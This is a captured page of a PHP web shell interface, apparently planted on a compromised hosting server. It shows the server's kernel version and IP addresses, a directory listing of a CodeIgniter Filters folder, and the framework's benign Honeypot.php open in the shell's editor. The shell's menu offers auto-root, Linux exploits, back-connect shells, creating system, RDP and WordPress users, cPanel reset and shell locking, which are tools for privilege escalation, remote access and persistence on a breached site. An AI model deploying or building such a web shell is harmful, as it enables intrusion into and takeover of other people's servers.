Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
public_html /
system /
Filters /
[ HOME SHELL ]
Name
Size
Permission
Action
Exceptions
[ DIR ]
drwxr-xr-x
CSRF.php
1.82
KB
-rw-r--r--
DebugToolbar.php
1011
B
-rw-r--r--
FilterInterface.php
1.35
KB
-rw-r--r--
Filters.php
15.19
KB
-rw-r--r--
Honeypot.php
1.15
KB
-rw-r--r--
InvalidChars.php
2.82
KB
-rw-r--r--
SecureHeaders.php
2.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Honeypot.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter\Filters; use CodeIgniter\Honeypot\Exceptions\HoneypotException; use CodeIgniter\HTTP\RequestInterface; use CodeIgniter\HTTP\ResponseInterface; use Config\Services; /** * Honeypot filter */ class Honeypot implements FilterInterface { /** * Checks if Honeypot field is empty, if not then the * requester is a bot * * @param array|null $arguments * * @throws HoneypotException */ public function before(RequestInterface $request, $arguments = null) { if (Services::honeypot()->hasContent($request)) { throw HoneypotException::isBot(); } } /** * Attach a honeypot to the current response. * * @param array|null $arguments */ public function after(RequestInterface $request, ResponseInterface $response, $arguments = null) { Services::honeypot()->attachHoneypot($response); } }
Close